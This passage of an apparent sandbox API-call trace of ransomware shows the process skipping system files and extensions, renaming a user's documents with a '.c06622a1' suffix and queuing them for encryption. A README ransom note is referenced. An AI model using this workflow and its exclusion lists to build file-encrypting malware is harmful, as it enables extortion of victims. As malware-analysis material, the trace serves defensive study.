lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa831c600, ftCreationTime.dwHighDateTime=0x1d5dd64, ftLastAccessTime.dwLowDateTime=0xd582b640, ftLastAccessTime.dwHighDateTime=0x1d5dec3, ftLastWriteTime.dwLowDateTime=0xd582b640, ftLastWriteTime.dwHighDateTime=0x1d5dec3, nFileSizeHigh=0x0, nFileSizeLow=0x10159, dwReserved0=0x0, dwReserved1=0x0, cFileName="ASgzk.odp", cAlternateFileName="")) returned 1 [0157.475] _wcsicmp (_Str1="ASgzk.odp", _Str2="README.c06622a1.TXT") returned -17 [0157.476] wcsstr (_Str="ASgzk.odp", _SubStr="README") returned 0x0 [0157.476] _wcsicmp (_Str1="autorun.inf", _Str2="ASgzk.odp") returned 2 [0157.476] wcslen (_String="autorun.inf") returned 0xb [0157.476] _wcsicmp (_Str1="boot.ini", _Str2="ASgzk.odp") returned 1 [0157.476] wcslen (_String="boot.ini") returned 0x8 [0157.476] _wcsicmp (_Str1="bootfont.bin", _Str2="ASgzk.odp") returned 1 [0157.476] wcslen (_String="bootfont.bin") returned 0xc [0157.476] _wcsicmp (_Str1="bootsect.bak", _Str2="ASgzk.odp") returned 1 [0157.476] wcslen (_String="bootsect.bak") returned 0xc [0157.476] _wcsicmp (_Str1="desktop.ini", _Str2="ASgzk.odp") returned 3 [0157.476] wcslen (_String="desktop.ini") returned 0xb [0157.476] _wcsicmp (_Str1="iconcache.db", _Str2="ASgzk.odp") returned 8 [0157.476] wcslen (_String="iconcache.db") returned 0xc [0157.476] _wcsicmp (_Str1="ntldr", _Str2="ASgzk.odp") returned 13 [0157.476] wcslen (_String="ntldr") returned 0x5 [0157.476] _wcsicmp (_Str1="ntuser.dat", _Str2="ASgzk.odp") returned 13 [0157.476] wcslen (_String="ntuser.dat") returned 0xa [0157.476] _wcsicmp (_Str1="ntuser.dat.log", _Str2="ASgzk.odp") returned 13 [0157.476] wcslen (_String="ntuser.dat.log") returned 0xe [0157.476] _wcsicmp (_Str1="ntuser.ini", _Str2="ASgzk.odp") returned 13 [0157.476] wcslen (_String="ntuser.ini") returned 0xa [0157.476] _wcsicmp (_Str1="thumbs.db", _Str2="ASgzk.odp") returned 19 [0157.476] wcslen (_String="thumbs.db") returned 0x9 [0157.476] _wcsicmp (_Str1="386", _Str2="odp") returned -60 [0157.476] wcslen (_String="386") returned 0x3 [0157.476] _wcsicmp (_Str1="adv", _Str2="odp") returned -14 [0157.476] wcslen (_String="adv") returned 0x3 [0157.476] _wcsicmp (_Str1="ani", _Str2="odp") returned -14 [0157.476] wcslen (_String="ani") returned 0x3 [0157.476] _wcsicmp (_Str1="bat", _Str2="odp") returned -13 [0157.476] wcslen (_String="bat") returned 0x3 [0157.476] _wcsicmp (_Str1="bin", _Str2="odp") returned -13 [0157.477] wcslen (_String="bin") returned 0x3 [0157.477] _wcsicmp (_Str1="cab", _Str2="odp") returned -12 [0157.477] wcslen (_String="cab") returned 0x3 [0157.477] _wcsicmp (_Str1="cmd", _Str2="odp") returned -12 [0157.477] wcslen (_String="cmd") returned 0x3 [0157.477] _wcsicmp (_Str1="com", _Str2="odp") returned -12 [0157.477] wcslen (_String="com") returned 0x3 [0157.477] _wcsicmp (_Str1="cpl", _Str2="odp") returned -12 [0157.477] wcslen (_String="cpl") returned 0x3 [0157.477] _wcsicmp (_Str1="cur", _Str2="odp") returned -12 [0157.477] wcslen (_String="cur") returned 0x3 [0157.477] _wcsicmp (_Str1="deskthemepack", _Str2="odp") returned -11 [0157.477] wcslen (_String="deskthemepack") returned 0xd [0157.477] _wcsicmp (_Str1="diagcab", _Str2="odp") returned -11 [0157.477] wcslen (_String="diagcab") returned 0x7 [0157.477] _wcsicmp (_Str1="diagcfg", _Str2="odp") returned -11 [0157.477] wcslen (_String="diagcfg") returned 0x7 [0157.477] _wcsicmp (_Str1="diagpkg", _Str2="odp") returned -11 [0157.477] wcslen (_String="diagpkg") returned 0x7 [0157.477] _wcsicmp (_Str1="dll", _Str2="odp") returned -11 [0157.477] wcslen (_String="dll") returned 0x3 [0157.477] _wcsicmp (_Str1="drv", _Str2="odp") returned -11 [0157.477] wcslen (_String="drv") returned 0x3 [0157.477] _wcsicmp (_Str1="exe", _Str2="odp") returned -10 [0157.477] wcslen (_String="exe") returned 0x3 [0157.477] _wcsicmp (_Str1="hlp", _Str2="odp") returned -7 [0157.477] wcslen (_String="hlp") returned 0x3 [0157.477] _wcsicmp (_Str1="icl", _Str2="odp") returned -6 [0157.477] wcslen (_String="icl") returned 0x3 [0157.477] _wcsicmp (_Str1="icns", _Str2="odp") returned -6 [0157.477] wcslen (_String="icns") returned 0x4 [0157.477] _wcsicmp (_Str1="ico", _Str2="odp") returned -6 [0157.477] wcslen (_String="ico") returned 0x3 [0157.477] _wcsicmp (_Str1="ics", _Str2="odp") returned -6 [0157.478] wcslen (_String="ics") returned 0x3 [0157.478] _wcsicmp (_Str1="idx", _Str2="odp") returned -6 [0157.478] wcslen (_String="idx") returned 0x3 [0157.478] _wcsicmp (_Str1="ldf", _Str2="odp") returned -3 [0157.478] wcslen (_String="ldf") returned 0x3 [0157.478] _wcsicmp (_Str1="lnk", _Str2="odp") returned -3 [0157.478] wcslen (_String="lnk") returned 0x3 [0157.478] _wcsicmp (_Str1="mod", _Str2="odp") returned -2 [0157.478] wcslen (_String="mod") returned 0x3 [0157.478] _wcsicmp (_Str1="mpa", _Str2="odp") returned -2 [0157.478] wcslen (_String="mpa") returned 0x3 [0157.478] _wcsicmp (_Str1="msc", _Str2="odp") returned -2 [0157.478] wcslen (_String="msc") returned 0x3 [0157.478] _wcsicmp (_Str1="msp", _Str2="odp") returned -2 [0157.478] wcslen (_String="msp") returned 0x3 [0157.478] _wcsicmp (_Str1="msstyles", _Str2="odp") returned -2 [0157.478] wcslen (_String="msstyles") returned 0x8 [0157.478] _wcsicmp (_Str1="msu", _Str2="odp") returned -2 [0157.478] wcslen (_String="msu") returned 0x3 [0157.478] _wcsicmp (_Str1="nls", _Str2="odp") returned -1 [0157.478] wcslen (_String="nls") returned 0x3 [0157.478] _wcsicmp (_Str1="nomedia", _Str2="odp") returned -1 [0157.478] wcslen (_String="nomedia") returned 0x7 [0157.478] _wcsicmp (_Str1="ocx", _Str2="odp") returned -1 [0157.478] wcslen (_String="ocx") returned 0x3 [0157.478] _wcsicmp (_Str1="prf", _Str2="odp") returned 1 [0157.478] wcslen (_String="prf") returned 0x3 [0157.478] _wcsicmp (_Str1="ps1", _Str2="odp") returned 1 [0157.478] wcslen (_String="ps1") returned 0x3 [0157.478] _wcsicmp (_Str1="rom", _Str2="odp") returned 3 [0157.478] wcslen (_String="rom") returned 0x3 [0157.478] _wcsicmp (_Str1="rtp", _Str2="odp") returned 3 [0157.478] wcslen (_String="rtp") returned 0x3 [0157.478] _wcsicmp (_Str1="scr", _Str2="odp") returned 4 [0157.479] wcslen (_String="scr") returned 0x3 [0157.479] _wcsicmp (_Str1="shs", _Str2="odp") returned 4 [0157.479] wcslen (_String="shs") returned 0x3 [0157.479] _wcsicmp (_Str1="spl", _Str2="odp") returned 4 [0157.479] wcslen (_String="spl") returned 0x3 [0157.479] _wcsicmp (_Str1="sys", _Str2="odp") returned 4 [0157.479] wcslen (_String="sys") returned 0x3 [0157.479] _wcsicmp (_Str1="theme", _Str2="odp") returned 5 [0157.479] wcslen (_String="theme") returned 0x5 [0157.479] _wcsicmp (_Str1="themepack", _Str2="odp") returned 5 [0157.479] wcslen (_String="themepack") returned 0x9 [0157.479] _wcsicmp (_Str1="wpx", _Str2="odp") returned 8 [0157.479] wcslen (_String="wpx") returned 0x3 [0157.479] _wcsicmp (_Str1="lock", _Str2="odp") returned -3 [0157.479] wcslen (_String="lock") returned 0x4 [0157.479] _wcsicmp (_Str1="key", _Str2="odp") returned -4 [0157.479] wcslen (_String="key") returned 0x3 [0157.479] _wcsicmp (_Str1="hta", _Str2="odp") returned -7 [0157.479] wcslen (_String="hta") returned 0x3 [0157.479] _wcsicmp (_Str1="msi", _Str2="odp") returned -2 [0157.479] wcslen (_String="msi") returned 0x3 [0157.479] _wcsicmp (_Str1="pdb", _Str2="odp") returned 1 [0157.479] wcslen (_String="pdb") returned 0x3 [0157.480] _wcsicmp (_Str1="sqlite", _Str2="odp") returned 4 [0157.480] wcslen (_String="sqlite") returned 0x6 [0157.480] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0157.480] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0157.480] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0157.480] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0157.480] wcscpy (in: _Dest=0x32100a0, _Source="ASgzk.odp" | out: _Dest="ASgzk.odp") returned="ASgzk.odp" [0157.480] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ASgzk.odp", dwFileAttributes=0x80) returned 1 [0157.483] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ASgzk.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\asgzk.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0157.483] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.483] ReadFile (in: hFile=0x1c0, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0157.484] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0xe61b0aac [0157.484] RtlComputeCrc32 (PartialCrc=0xaac, Buffer=0x32ec24, Length=0x80) returned 0x324948f0 [0157.484] RtlComputeCrc32 (PartialCrc=0x48f0, Buffer=0x32ec24, Length=0x80) returned 0x88197839 [0157.484] RtlComputeCrc32 (PartialCrc=0x7839, Buffer=0x32ec24, Length=0x80) returned 0x8cf9342f [0157.484] RtlComputeCrc32 (PartialCrc=0x342f, Buffer=0x32ec24, Length=0x80) returned 0x50c64406 [0157.484] CloseHandle (hObject=0x1c0) returned 1 [0157.484] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0157.484] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ASgzk.odp" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ASgzk.odp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ASgzk.odp" [0157.484] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ASgzk.odp") returned 0x35 [0157.484] wcscpy (in: _Dest=0x32200ba, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0157.484] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ASgzk.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\asgzk.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ASgzk.odp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\asgzk.odp.c06622a1"), dwFlags=0x8) returned 1 [0157.501] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ASgzk.odp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\asgzk.odp.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c0 [0157.502] CreateIoCompletionPort (FileHandle=0x1c0, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0157.502] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x35a0020 [0157.511] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x507282d6 [0157.511] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x370a8b73 [0157.511] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6ea79e43 [0157.511] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7f359c31 [0157.511] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1005deea [0157.511] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x50fd58d5 [0157.511] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4228f65b [0157.511] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7fd9b341 [0157.514] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x35a0094, Length=0x80) returned 0x14fde881 [0157.515] RtlComputeCrc32 (PartialCrc=0xe881, Buffer=0x35a0094, Length=0x80) returned 0xa18e99d7 [0157.515] RtlComputeCrc32 (PartialCrc=0x99d7, Buffer=0x35a0094, Length=0x80) returned 0x26a29eb6 [0157.515] RtlComputeCrc32 (PartialCrc=0x9eb6, Buffer=0x35a0094, Length=0x80) returned 0xbdd095cc [0157.515] RtlComputeCrc32 (PartialCrc=0x95cc, Buffer=0x35a0094, Length=0x80) returned 0x321adcad [0157.515] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x35a0020) returned 1 [0157.515] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0157.516] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0157.517] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x694f700, ftCreationTime.dwHighDateTime=0x1d5668f, ftLastAccessTime.dwLowDateTime=0x20286490, ftLastAccessTime.dwHighDateTime=0x1d5cae4, ftLastWriteTime.dwLowDateTime=0x20286490, ftLastWriteTime.dwHighDateTime=0x1d5cae4, nFileSizeHigh=0x0, nFileSizeLow=0x17a4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bi_N4C.xlsx", cAlternateFileName="BI_N4C~1.XLS")) returned 1 [0157.517] _wcsicmp (_Str1="bi_N4C.xlsx", _Str2="README.c06622a1.TXT") returned -16 [0157.518] wcsstr (_Str="bi_N4C.xlsx", _SubStr="README") returned 0x0 [0157.518] _wcsicmp (_Str1="autorun.inf", _Str2="bi_N4C.xlsx") returned -1 [0157.518] wcslen (_String="autorun.inf") returned 0xb [0157.518] _wcsicmp (_Str1="boot.ini", _Str2="bi_N4C.xlsx") returned 6 [0157.518] wcslen (_String="boot.ini") returned 0x8 [0157.518] _wcsicmp (_Str1="bootfont.bin", _Str2="bi_N4C.xlsx") returned 6 [0157.518] wcslen (_String="bootfont.bin") returned 0xc [0157.518] _wcsicmp (_Str1="bootsect.bak", _Str2="bi_N4C.xlsx") returned 6 [0157.518] wcslen (_String="bootsect.bak") returned 0xc [0157.518] _wcsicmp (_Str1="desktop.ini", _Str2="bi_N4C.xlsx") returned 2 [0157.518] wcslen (_String="desktop.ini") returned 0xb [0157.518] _wcsicmp (_Str1="iconcache.db", _Str2="bi_N4C.xlsx") returned 7 [0157.518] wcslen (_String="iconcache.db") returned 0xc [0157.518] _wcsicmp (_Str1="ntldr", _Str2="bi_N4C.xlsx") returned 12 [0157.518] wcslen (_String="ntldr") returned 0x5 [0157.518] _wcsicmp (_Str1="ntuser.dat", _Str2="bi_N4C.xlsx") returned 12 [0157.518] wcslen (_String="ntuser.dat") returned 0xa [0157.518] _wcsicmp (_Str1="ntuser.dat.log", _Str2="bi_N4C.xlsx") returned 12 [0157.518] wcslen (_String="ntuser.dat.log") returned 0xe [0157.518] _wcsicmp (_Str1="ntuser.ini", _Str2="bi_N4C.xlsx") returned 12 [0157.518] wcslen (_String="ntuser.ini") returned 0xa [0157.518] _wcsicmp (_Str1="thumbs.db", _Str2="bi_N4C.xlsx") returned 18 [0157.518] wcslen (_String="thumbs.db") returned 0x9 [0157.518] _wcsicmp (_Str1="386", _Str2="xlsx") returned -69 [0157.518] wcslen (_String="386") returned 0x3 [0157.518] _wcsicmp (_Str1="adv", _Str2="xlsx") returned -23 [0157.519] wcslen (_String="adv") returned 0x3 [0157.519] _wcsicmp (_Str1="ani", _Str2="xlsx") returned -23 [0157.519] wcslen (_String="ani") returned 0x3 [0157.519] _wcsicmp (_Str1="bat", _Str2="xlsx") returned -22 [0157.519] wcslen (_String="bat") returned 0x3 [0157.519] _wcsicmp (_Str1="bin", _Str2="xlsx") returned -22 [0157.519] wcslen (_String="bin") returned 0x3 [0157.519] _wcsicmp (_Str1="cab", _Str2="xlsx") returned -21 [0157.519] wcslen (_String="cab") returned 0x3 [0157.519] _wcsicmp (_Str1="cmd", _Str2="xlsx") returned -21 [0157.519] wcslen (_String="cmd") returned 0x3 [0157.519] _wcsicmp (_Str1="com", _Str2="xlsx") returned -21 [0157.519] wcslen (_String="com") returned 0x3 [0157.519] _wcsicmp (_Str1="cpl", _Str2="xlsx") returned -21 [0157.519] wcslen (_String="cpl") returned 0x3 [0157.519] _wcsicmp (_Str1="cur", _Str2="xlsx") returned -21 [0157.519] wcslen (_String="cur") returned 0x3 [0157.519] _wcsicmp (_Str1="deskthemepack", _Str2="xlsx") returned -20 [0157.519] wcslen (_String="deskthemepack") returned 0xd [0157.519] _wcsicmp (_Str1="diagcab", _Str2="xlsx") returned -20 [0157.519] wcslen (_String="diagcab") returned 0x7 [0157.519] _wcsicmp (_Str1="diagcfg", _Str2="xlsx") returned -20 [0157.519] wcslen (_String="diagcfg") returned 0x7 [0157.519] _wcsicmp (_Str1="diagpkg", _Str2="xlsx") returned -20 [0157.519] wcslen (_String="diagpkg") returned 0x7 [0157.519] _wcsicmp (_Str1="dll", _Str2="xlsx") returned -20 [0157.520] wcslen (_String="dll") returned 0x3 [0157.520] _wcsicmp (_Str1="drv", _Str2="xlsx") returned -20 [0157.520] wcslen (_String="drv") returned 0x3 [0157.520] _wcsicmp (_Str1="exe", _Str2="xlsx") returned -19 [0157.520] wcslen (_String="exe") returned 0x3 [0157.520] _wcsicmp (_Str1="hlp", _Str2="xlsx") returned -16 [0157.520] wcslen (_String="hlp") returned 0x3 [0157.520] _wcsicmp (_Str1="icl", _Str2="xlsx") returned -15 [0157.520] wcslen (_String="icl") returned 0x3 [0157.520] _wcsicmp (_Str1="icns", _Str2="xlsx") returned -15 [0157.520] wcslen (_String="icns") returned 0x4 [0157.520] _wcsicmp (_Str1="ico", _Str2="xlsx") returned -15 [0157.520] wcslen (_String="ico") returned 0x3 [0157.520] _wcsicmp (_Str1="ics", _Str2="xlsx") returned -15 [0157.520] wcslen (_String="ics") returned 0x3 [0157.520] _wcsicmp (_Str1="idx", _Str2="xlsx") returned -15 [0157.520] wcslen (_String="idx") returned 0x3 [0157.520] _wcsicmp (_Str1="ldf", _Str2="xlsx") returned -12 [0157.520] wcslen (_String="ldf") returned 0x3 [0157.520] _wcsicmp (_Str1="lnk", _Str2="xlsx") returned -12 [0157.520] wcslen (_String="lnk") returned 0x3 [0157.521] _wcsicmp (_Str1="mod", _Str2="xlsx") returned -11 [0157.521] wcslen (_String="mod") returned 0x3 [0157.521] _wcsicmp (_Str1="mpa", _Str2="xlsx") returned -11 [0157.521] wcslen (_String="mpa") returned 0x3 [0157.521] _wcsicmp (_Str1="msc", _Str2="xlsx") returned -11 [0157.521] wcslen (_String="msc") returned 0x3 [0157.521] _wcsicmp (_Str1="msp", _Str2="xlsx") returned -11 [0157.521] wcslen (_String="msp") returned 0x3 [0157.521] _wcsicmp (_Str1="msstyles", _Str2="xlsx") returned -11 [0157.521] wcslen (_String="msstyles") returned 0x8 [0157.521] _wcsicmp (_Str1="msu", _Str2="xlsx") returned -11 [0157.521] wcslen (_String="msu") returned 0x3 [0157.521] _wcsicmp (_Str1="nls", _Str2="xlsx") returned -10 [0157.521] wcslen (_String="nls") returned 0x3 [0157.521] _wcsicmp (_Str1="nomedia", _Str2="xlsx") returned -10 [0157.521] wcslen (_String="nomedia") returned 0x7 [0157.521] _wcsicmp (_Str1="ocx", _Str2="xlsx") returned -9 [0157.521] wcslen (_String="ocx") returned 0x3 [0157.522] _wcsicmp (_Str1="prf", _Str2="xlsx") returned -8 [0157.522] wcslen (_String="prf") returned 0x3 [0157.522] _wcsicmp (_Str1="ps1", _Str2="xlsx") returned -8 [0157.522] wcslen (_String="ps1") returned 0x3 [0157.522] _wcsicmp (_Str1="rom", _Str2="xlsx") returned -6 [0157.522] wcslen (_String="rom") returned 0x3 [0157.522] _wcsicmp (_Str1="rtp", _Str2="xlsx") returned -6 [0157.522] wcslen (_String="rtp") returned 0x3 [0157.522] _wcsicmp (_Str1="scr", _Str2="xlsx") returned -5 [0157.522] wcslen (_String="scr") returned 0x3 [0157.522] _wcsicmp (_Str1="shs", _Str2="xlsx") returned -5 [0157.522] wcslen (_String="shs") returned 0x3 [0157.522] _wcsicmp (_Str1="spl", _Str2="xlsx") returned -5 [0157.522] wcslen (_String="spl") returned 0x3 [0157.522] _wcsicmp (_Str1="sys", _Str2="xlsx") returned -5 [0157.522] wcslen (_String="sys") returned 0x3 [0157.522] _wcsicmp (_Str1="theme", _Str2="xlsx") returned -4 [0157.522] wcslen (_String="theme") returned 0x5 [0157.522] _wcsicmp (_Str1="themepack", _Str2="xlsx") returned -4 [0157.522] wcslen (_String="themepack") returned 0x9 [0157.522] _wcsicmp (_Str1="wpx", _Str2="xlsx") returned -1 [0157.522] wcslen (_String="wpx") returned 0x3 [0157.522] _wcsicmp (_Str1="lock", _Str2="xlsx") returned -12 [0157.522] wcslen (_String="lock") returned 0x4 [0157.522] _wcsicmp (_Str1="key", _Str2="xlsx") returned -13 [0157.522] wcslen (_String="key") returned 0x3 [0157.522] _wcsicmp (_Str1="hta", _Str2="xlsx") returned -16 [0157.522] wcslen (_String="hta") returned 0x3 [0157.523] _wcsicmp (_Str1="msi", _Str2="xlsx") returned -11 [0157.523] wcslen (_String="msi") returned 0x3 [0157.523] _wcsicmp (_Str1="pdb", _Str2="xlsx") returned -8 [0157.523] wcslen (_String="pdb") returned 0x3 [0157.523] _wcsicmp (_Str1="sqlite", _Str2="xlsx") returned -5 [0157.523] wcslen (_String="sqlite") returned 0x6 [0157.523] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0157.523] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0157.523] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0157.523] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0157.523] wcscpy (in: _Dest=0x32100a0, _Source="bi_N4C.xlsx" | out: _Dest="bi_N4C.xlsx") returned="bi_N4C.xlsx" [0157.523] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bi_N4C.xlsx", dwFileAttributes=0x80) returned 1 [0157.541] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bi_N4C.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bi_n4c.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0157.541] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.541] ReadFile (in: hFile=0x1bc, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0157.542] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0xfcd6139b [0157.542] RtlComputeCrc32 (PartialCrc=0x139b, Buffer=0x32ec24, Length=0x80) returned 0xf4ba4c28 [0157.542] RtlComputeCrc32 (PartialCrc=0x4c28, Buffer=0x32ec24, Length=0x80) returned 0xfc9f0025 [0157.542] RtlComputeCrc32 (PartialCrc=0x25, Buffer=0x32ec24, Length=0x80) returned 0x3b777529 [0157.542] RtlComputeCrc32 (PartialCrc=0x7529, Buffer=0x32ec24, Length=0x80) returned 0xb2e4b6b0 [0157.542] CloseHandle (hObject=0x1bc) returned 1 [0157.542] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0157.542] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bi_N4C.xlsx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bi_N4C.xlsx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bi_N4C.xlsx" [0157.542] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bi_N4C.xlsx") returned 0x37 [0157.542] wcscpy (in: _Dest=0x32200be, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0157.542] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bi_N4C.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bi_n4c.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bi_N4C.xlsx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bi_n4c.xlsx.c06622a1"), dwFlags=0x8) returned 1 [0157.561] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bi_N4C.xlsx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bi_n4c.xlsx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1bc [0157.562] CreateIoCompletionPort (FileHandle=0x1bc, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0157.562] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0157.566] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x741ae6df [0157.566] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x29c977f [0157.566] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x44bd0142 [0157.566] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x40a4c584 [0157.566] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1561fe4e [0157.566] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x50e65fed [0157.567] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x57887f7a [0157.567] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x746ff539 [0157.570] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0x8f9f64aa [0157.570] RtlComputeCrc32 (PartialCrc=0x64aa, Buffer=0x710094, Length=0x80) returned 0xd8a262d [0157.570] RtlComputeCrc32 (PartialCrc=0x262d, Buffer=0x710094, Length=0x80) returned 0x7e238797 [0157.570] RtlComputeCrc32 (PartialCrc=0x8797, Buffer=0x710094, Length=0x80) returned 0x44ad84ec [0157.570] RtlComputeCrc32 (PartialCrc=0x84ec, Buffer=0x710094, Length=0x80) returned 0x413e92f8 [0157.570] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0157.570] RtlFreeHeap 